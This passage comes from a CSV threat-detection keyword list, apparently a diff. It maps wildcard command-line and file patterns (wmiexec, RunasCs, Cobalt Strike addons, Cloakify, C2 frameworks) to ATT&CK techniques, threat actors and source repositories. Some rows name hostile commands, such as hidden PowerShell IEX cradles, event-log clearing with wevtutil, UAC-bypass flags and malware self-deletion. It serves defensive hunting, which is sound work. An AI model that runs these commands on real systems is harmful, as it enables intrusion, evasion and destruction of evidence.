APT29","C2","https://github.com/BronzeTicket/ClipboardWindow-Inject","1","1","N/A","10","10","58","11","2022-09-15T01:41:39Z","2022-09-14T15:55:06Z" +"*clipmon.sln*","offensive_tool_keyword","cobaltstrike","Cobaltstrike addons to interact with clipboard","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/DallasFR/Cobalt-Clip","1","1","N/A","10",,"N/A",,, +"*cloakify*","offensive_tool_keyword","cloakify","CloakifyFactory & the Cloakify Toolset - Data Exfiltration & Infiltration In Plain Sight. Evade DLP/MLS Devices. Social Engineering of Analysts. Defeat Data Whitelisting Controls. Evade AV Detection. Text-based steganography using lists. Convert any file type (e.g. executables. Office. Zip. images) into a list of everyday strings. Very simple tools. powerful concept. limited only by your imagination.","T1001 - T1003 - T1027 - T1036 - T1048 - T1052","TA0010","N/A","N/A","Data Exfiltration","https://github.com/TryCatchHCF/Cloakify","1","0","N/A","N/A","10","1440","233","2020-11-24T05:25:04Z","2016-05-07T04:52:26Z" +"*CloakNDaggerC2-main*","offensive_tool_keyword","CloakNDaggerC2","A C2 framework designed around the use of public/private RSA key pairs to sign and authenticate commands being executed. This prevents MiTM interception of calls and ensures opsec during delicate operations.","T1090 - T1090.003 - T1071 - T1071.001 - T1553 - T1553.002","TA0011 - TA0042 - TA0003","N/A","N/A","C2","https://github.com/matt-culbert/CloakNDaggerC2","1","1","N/A","10","10","4","2","2023-10-04T12:32:38Z","2023-04-28T01:58:18Z" +"*cloc.exe --exclude-dir*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1027 - T1055 - T1070 - T1112 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"*cloud_enum-master.zip*","offensive_tool_keyword","cloud_enum","Multi-cloud OSINT tool. Enumerate public resources in AWS Azure and Google Cloud.","T1596","TA0043","N/A","N/A","Reconnaissance","https://github.com/initstring/cloud_enum","1","1","N/A","6","10","1242","199","2023-07-31T07:27:37Z","2019-05-31T09:14:05Z" +"*cloudfail.py --target seo.com --tor*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*cloudFilterEOP.exe*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*cloudmapper collect --account parent --profile parent*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*cloudmapper configure add-account --config-file config.json --name parent --id XXX --default true*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*cloudmapper configure discover-organization-accounts*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*cloudsplaining create-multi-account-config-file -o accounts.yml*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*cloudsplaining download --profile someprofile*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*cloudsplaining scan --input-file default.json*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*cloudsplaining scan-multi-account -c accounts.yml -r TargetRole --output-directory ./*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*cloudsplaining scan-policy-file --input-file examples/policies/wildcards.json*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*cloudsploit *","offensive_tool_keyword","cloudsploit","CloudSploit by Aqua is an open-source project designed to allow detection of security risks in cloud infrastructure accounts including: Amazon Web Services (AWS) - Microsoft Azure - Google Cloud Platform (GCP) - Oracle Cloud Infrastructure (OCI) and GitHub. These scripts are designed to return a series of potential misconfigurations and security risks.","T1526 - T1534 - T1547 - T1078 - T1046","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/aquasecurity/cloudsploit","1","0","N/A","N/A","10","2922","641","2023-09-29T16:35:48Z","2015-06-29T15:33:40Z" +"*cloudsploit*cloudtrail*","offensive_tool_keyword","cloudsploit","CloudSploit by Aqua is an open-source project designed to allow detection of security risks in cloud infrastructure accounts including: Amazon Web Services (AWS) - Microsoft Azure - Google Cloud Platform (GCP) - Oracle Cloud Infrastructure (OCI) and GitHub. These scripts are designed to return a series of potential misconfigurations and security risks.","T1526 - T1534 - T1547 - T1078 - T1046","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/aquasecurity/cloudsploit","1","1","N/A","N/A","10","2922","641","2023-09-29T16:35:48Z","2015-06-29T15:33:40Z" +"*cloudsploit/index.js*","offensive_tool_keyword","cloudsploit","CloudSploit by Aqua is an open-source project designed to allow detection of security risks in cloud infrastructure accounts including: Amazon Web Services (AWS) - Microsoft Azure - Google Cloud Platform (GCP) - Oracle Cloud Infrastructure (OCI) and GitHub. These scripts are designed to return a series of potential misconfigurations and security risks.","T1526 - T1534 - T1547 - T1078 - T1046","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/aquasecurity/cloudsploit","1","1","N/A","N/A","10","2922","641","2023-09-29T16:35:48Z","2015-06-29T15:33:40Z" +"*cloudsploit/scans*","offensive_tool_keyword","cloudsploit","CloudSploit by Aqua is an open-source project designed to allow detection of security risks in cloud infrastructure accounts including: Amazon Web Services (AWS) - Microsoft Azure - Google Cloud Platform (GCP) - Oracle Cloud Infrastructure (OCI) and GitHub. These scripts are designed to return a series of potential misconfigurations and security risks.","T1526 - T1534 - T1547 - T1078 - T1046","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/aquasecurity/cloudsploit","1","1","N/A","N/A","10","2922","641","2023-09-29T16:35:48Z","2015-06-29T15:33:40Z" +"*CloudSploitSupplemental*","offensive_tool_keyword","cloudsploit","CloudSploit by Aqua is an open-source project designed to allow detection of security risks in cloud infrastructure accounts including: Amazon Web Services (AWS) - Microsoft Azure - Google Cloud Platform (GCP) - Oracle Cloud Infrastructure (OCI) and GitHub. These scripts are designed to return a series of potential misconfigurations and security risks.","T1526 - T1534 - T1547 - T1078 - T1046","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/aquasecurity/cloudsploit","1","1","N/A","N/A","10","2922","641","2023-09-29T16:35:48Z","2015-06-29T15:33:40Z" +"*cloudtrail__csv_injection*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3689","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" +"*clr2of8/GatherContacts*","offensive_tool_keyword","GatherContacts","A Burp Suite Extension to pull Employee Names from Google and Bing LinkedIn Search Results.As part of reconnaissance when performing a penetration test. it is often useful to gather employee names that can then be massaged into email addresses and usernames. The usernames may come in handy for performing a password spraying attack for example. One easy way to gather employee names is to use the following Burp Suite Pro extension as described below.","T1593 - T1533 - T1087","TA0043 - TA0002","N/A","N/A","Information Gathering","https://github.com/clr2of8/GatherContacts","1","1","N/A","N/A","2","169","44","2022-08-27T13:28:08Z","2018-03-29T14:46:14Z" +"*cmbndhnoonmghfofefkcccljbkdpamhi_14678.crx*","offensive_tool_keyword","hack-tools","The all-in-one Red Team browser extension for Web Pentester","T1059.007 - T1505 - T1068 - T1216 - T1547.009","TA0002 - TA0001 - TA0009","N/A","N/A","Web Attacks","https://github.com/LasCC/Hack-Tools","1","1","N/A","9","10","5007","586","2023-10-03T15:40:37Z","2020-06-22T21:42:16Z" +"*cmd /c * --bypass-uac*","offensive_tool_keyword","RunasCs","RunasCs - Csharp and open version of windows builtin runas.exe","T1059.003 - T1059.001 - T1035","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs/","1","0","N/A","6","8","722","107","2023-05-20T01:19:52Z","2019-08-08T20:18:18Z" +"*cmd /c * --remote-impersonation*","offensive_tool_keyword","RunasCs","RunasCs - Csharp and open version of windows builtin runas.exe","T1059.003 - T1059.001 - T1035","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs/","1","0","N/A","6","8","722","107","2023-05-20T01:19:52Z","2019-08-08T20:18:18Z" +"*cmd /c *if exist *.txt echo ImHere*","offensive_tool_keyword","smbmap","SMBMap allows users to enumerate samba share drives across an entire domain. List share drives. drive permissions. share contents. upload/download functionality. file name auto-download pattern matching. and even execute remote commands. This tool was designed with pen testing in mind. and is intended to simplify searching for potentially sensitive data across large networks.","T1210.001 - T1083 - T1213 - T1021","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Information Gathering","https://github.com/ShawnDEvans/smbmap","1","0","N/A","10","10","1555","344","2023-09-14T20:51:52Z","2015-03-16T13:15:00Z" +"*cmd /c mklink /d * HarddiskVolumeShadowCopy1*","offensive_tool_keyword","evil-winrm","This shell is the ultimate WinRM shell for hacking/pentesting.WinRM (Windows Remote Management) is the Microsoft implementation of WS-Management Protocol. A standard SOAP based protocol that allows hardware and operating systems from different vendors to interoperate. Microsoft included it in their Operating Systems in order to make life easier to system administrators.This program can be used on any Microsoft Windows Servers with this feature enabled (usually at port 5985). of course only if you have credentials and permissions to use it. So we can say that it could be used in a post-exploitation hacking/pentesting phase. The purpose of this program is to provide nice and easy-to-use features for hacking. It can be used with legitimate purposes by system administrators as well but the most of its features are focused on hacking/pentesting stuff.","T1021 - T1028 - T1046 - T1078 - T1091 - T1219","TA0003 - TA0008 - TA0009","N/A","N/A","Exploitation tools","https://github.com/Hackplayers/evil-winrm","1","0","N/A","10","10","3763","566","2023-06-09T07:42:42Z","2019-05-28T10:53:00Z" +"*cmd /c whoami* bypass*","offensive_tool_keyword","SharpToken","SharpToken is a tool for exploiting Token leaks. It can find leaked Tokens from all processes in the system and use them","T1134 - T1101 - T1214 - T1087 - T1038","TA0004 - TA0007","N/A","N/A","Exploitation tools","https://github.com/BeichenDream/SharpToken","1","0","N/A","N/A","4","353","47","2023-04-11T13:29:23Z","2022-06-30T07:34:57Z" +"*cmd smb *-u*-p*","offensive_tool_keyword","crackmapexec","crackmapexec command lines. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*cmd* wevtutil.exe cl *","greyware_tool_keyword","wevtutil","adversaries can delete specific event logs or clear their contents. erasing potentially valuable information that could aid in detection. incident response. or forensic investigations. This tactic aims to hinder forensic analysis efforts and make it more challenging for defenders to reconstruct the timeline of events or identify malicious activities.","T1070.004 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","N/A","1","0","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A" +"*cmd*echo*\pipe\*","greyware_tool_keyword","echo","Detects the use of getsystem Meterpreter/Cobalt Strike command. Getsystem is used to elevate privilege to SYSTEM account","T1068.003 - T1078.002","TA0004 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/win_meterpreter_or_cobaltstrike_getsystem_service_start.yml","1","0","greyware tool - risks of False positive !","N/A","10","6749","1944","2023-10-04T17:30:31Z","2016-12-24T09:48:49Z" +"*cmd.exe /S /D /c* echo 123","greyware_tool_keyword","echo","Adversaries may attempt to test echo command after exploitation","T1059.001 - T1059.003","TA0002 - TA0006","N/A","N/A","Defense Evasion","N/A","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*cmd.exe /c *echo test > C:\Users\Public\test.txt*","offensive_tool_keyword","NimExec","Fileless Command Execution for Lateral Movement in Nim","T1021.006 - T1059.005 - T1564.001","TA0008 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/frkngksl/NimExec","1","0","N/A","N/A","4","307","33","2023-06-23T11:07:20Z","2023-04-21T19:46:53Z" +"*cmd.exe /c chcp >&2*","greyware_tool_keyword","chcp","chcp displays the number of the active console code page","T1059 - T1027","TA0002 - TA0009","N/A","N/A","Discovery","https://thedfirreport.com/2023/04/03/malicious-iso-file-leads-to-domain-wide-ransomware/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*cmd.exe /c echo * > \\.\pipe\*","greyware_tool_keyword","echo","Named pipe impersonation","T1134.002 - T1055 - T1548.002","TA0004 - TA0003 - TA0002","N/A","N/A","Privilege Escalation","https://thedfirreport.com/2023/04/03/malicious-iso-file-leads-to-domain-wide-ransomware/","1","0","N/A","7","10","N/A","N/A","N/A","N/A" +"*cmd.exe /c rundll32.exe agressor.dll*stealth*","offensive_tool_keyword","mortar","red teaming evasion technique to defeat and divert detection and prevention of security products.Mortar Loader performs encryption and decryption of selected binary inside the memory streams and execute it directly with out writing any malicious indicator into the hard-drive. Mortar is able to bypass modern anti-virus products and advanced XDR solutions","T1055 - T1027 - T1036 - T1112 - T1037 - T1105 - T1059 - T1562","TA0002 - TA0003 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/0xsp-SRD/mortar","1","0","N/A","N/A","10","1181","193","2022-08-03T03:38:57Z","2021-11-25T16:49:47Z" +"*cmd.exe /c sc start plumber*","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","0","N/A","N/A","3","272","33","2023-08-17T02:45:17Z","2023-06-10T03:30:59Z" +"*cmd.exe /c timeout /t 5 & del /f /q *%s* & exit*","offensive_tool_keyword","mars stealer","Self-removal 'mars stealer' command","T1587","TA0002","mars stealer","","Malware","https://3xp0rt.com/posts/mars-stealer","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*cmd.exe /C wmic /node:* /user:* /password:* os get caption*","greyware_tool_keyword","wmic","gather information about Windows OS version and licensing on the hosts","T1047 - T1016 - T1082","TA0007 - TA0002 - TA0005","N/A","N/A","Discovery","https://thedfirreport.com/2023/05/22/icedid-macro-ends-in-nokoyawa-ransomware/","1","0","greyware tool - risks of False positive !","6","9","N/A","N/A","N/A","N/A" +"*cmd.exe /c zoom1.msi*","offensive_tool_keyword","Zloader","Zloader Installs Remote Access Backdoors and Delivers Cobalt Strike","T1059 - T1220 - T1566.001 - T1059.005 - T1218.011 - T1562.001 - T1204","TA0002 - TA0008 - TA0006 - TA0001 - TA0010 - TA0003","N/A","N/A","Exploitation tools","https://news.sophos.com/en-us/2022/01/19/zloader-installs-remote-access-backdoors-and-delivers-cobalt-strike/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*cmd.exe /Q /c *.bat *> \\127.0.0.1\ADMIN$\* 2&*","offensive_tool_keyword","wmiexec","wmiexec.py from impacket used by metasploit","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/rapid7/metasploit-framework/blob/2722067108b5c034da9f77b95eaf1c1db33db4fa/modules/auxiliary/scanner/smb/impacket/wmiexec.py#L127","1","0","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*cmd.exe /Q /c /start /min powershell.exe -nop -c*","offensive_tool_keyword","wmiexec","wmiexec.py from impacket used by metasploit","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/rapid7/metasploit-framework/blob/2722067108b5c034da9f77b95eaf1c1db33db4fa/modules/auxiliary/scanner/smb/impacket/wmiexec.py#L127","1","0","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*cmd.exe /Q /c hostname1> *\\127.0.0.1\ADMIN$\* 2>*","offensive_tool_keyword","wmiexec","wmiexec.py from impacket used by metasploit","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/rapid7/metasploit-framework/blob/2722067108b5c034da9f77b95eaf1c1db33db4fa/modules/auxiliary/scanner/smb/impacket/wmiexec.py#L127","1","0","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*cmd.exe /Q /c nslookup 1> *\\127.0.0.1\ADMIN$\* 2>*","offensive_tool_keyword","wmiexec","wmiexec.py from impacket used by metasploit","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/rapid7/metasploit-framework/blob/2722067108b5c034da9f77b95eaf1c1db33db4fa/modules/auxiliary/scanner/smb/impacket/wmiexec.py#L127","1","0","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*cmd.exe /Q /c powershell.exe -nop -w -hidden -c*IEX*","offensive_tool_keyword","wmiexec","wmiexec.py from impacket used by metasploit","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/rapid7/metasploit-framework/blob/2722067108b5c034da9f77b95eaf1c1db33db4fa/modules/auxiliary/scanner/smb/impacket/wmiexec.py#L127","1","0","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*cmd.exe /Q /c powershelll.exe 1> *\\127.0.0.1\ADMIN$\* 2>*","offensive_tool_keyword","wmiexec","wmiexec.py from impacket used by metasploit","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/rapid7/metasploit-framework/blob/2722067108b5c034da9f77b95eaf1c1db33db4fa/modules/auxiliary/scanner/smb/impacket/wmiexec.py#L127","1","0","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*cmd.exe /Q /c quser 1 > \\127.0.0.1\ADMIN$\*","offensive_tool_keyword","wmiexec","wmiexec.py from impacket used by metasploit","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/rapid7/metasploit-framework/blob/2722067108b5c034da9f77b95eaf1c1db33db4fa/modules/auxiliary/scanner/smb/impacket/wmiexec.py#L127","1","0","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*cmd.exe /Q /c start *stage1.exe 1*","offensive_tool_keyword","malware","Destructive Malware targeting organizations","T1486 T1059","TA0008","N/A","N/A","Ransomware","https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*cmd.exe*\TEMP\ScreenConnect\*.cmd*","greyware_tool_keyword","ScreenConnect","control remote servers - abused by threat actors","T1021.001 - T1078 - T1133 - T1112","TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010","N/A","N/A","RMM","screenconnect.com","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"*cmd/backdoor.go*","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/liamg/traitor","1","1","N/A","N/A","10","6215","494","2023-03-16T16:21:13Z","2021-01-24T10:50:15Z" +"*cmd/ligolo*","offensive_tool_keyword","ligolo","ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve)","T1071 - T1021 - T1573","TA0011 - TA0002","N/A","N/A","C2","https://github.com/sysdream/ligolo","1","1","N/A","10","10","1438","209","2023-01-06T19:49:22Z","2020-05-22T07:58:13Z" +"*cmd/ligolo*","offensive_tool_keyword","ligolo","ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve)","T1071 - T1021 - T1573","TA0011 - TA0002","N/A","N/A","C2","https://github.com/sysdream/ligolo","1","1","N/A","10","10","1438","209","2023-01-06T19:49:22Z","2020-05-22T07:58:13Z" +"*cmd/localrelay*","offensive_tool_keyword","ligolo","ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve)","T1071 - T1021 - T1573","TA0011 - TA0002","N/A","N/A","C2","https://github.com/sysdream/ligolo","1","1","N/A","10","10","1438","209","2023-01-06T19:49:22Z","2020-05-22T07:58:13Z" +"*cmd/merlinagent/*","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1043 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","1","N/A","10","10","1030","102","2023-04-08T08:32:23Z","2021-02-09T15:54:23Z" +"*cmd/merlinagentdll/*","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1043 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","1","N/A","10","10","1030","102","2023-04-08T08:32:23Z","2021-02-09T15:54:23Z" +"*cmd/setuid.go*","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/liamg/traitor","1","1","N/A","N/A","10","6215","494","2023-03-16T16:21:13Z","2021-01-24T10:50:15Z" +"*cmd_executor *","offensive_tool_keyword","mythic","mythic C2 agent","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/freyja/","1","0","N/A","10","10","11","6","2023-06-30T16:35:47Z","2022-09-28T17:20:04Z" +"*cmd_powershell.cpp*","offensive_tool_keyword","ShadowForgeC2","ShadowForge Command & Control - Harnessing the power of Zoom API - control a compromised Windows Machine from your Zoom Chats.","T1071.001 - T1569.002 - T1059.001","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/0xEr3bus/ShadowForgeC2","1","1","N/A","10","10","35","5","2023-07-15T11:45:36Z","2023-07-13T11:49:36Z" +"*cmd_shellcodex64.*","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","720","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" +"*cmd_shellcodex86.*","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","720","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" +"*Cmd-Execute-Assembly.*","offensive_tool_keyword","nimplant","A light-weight first-stage 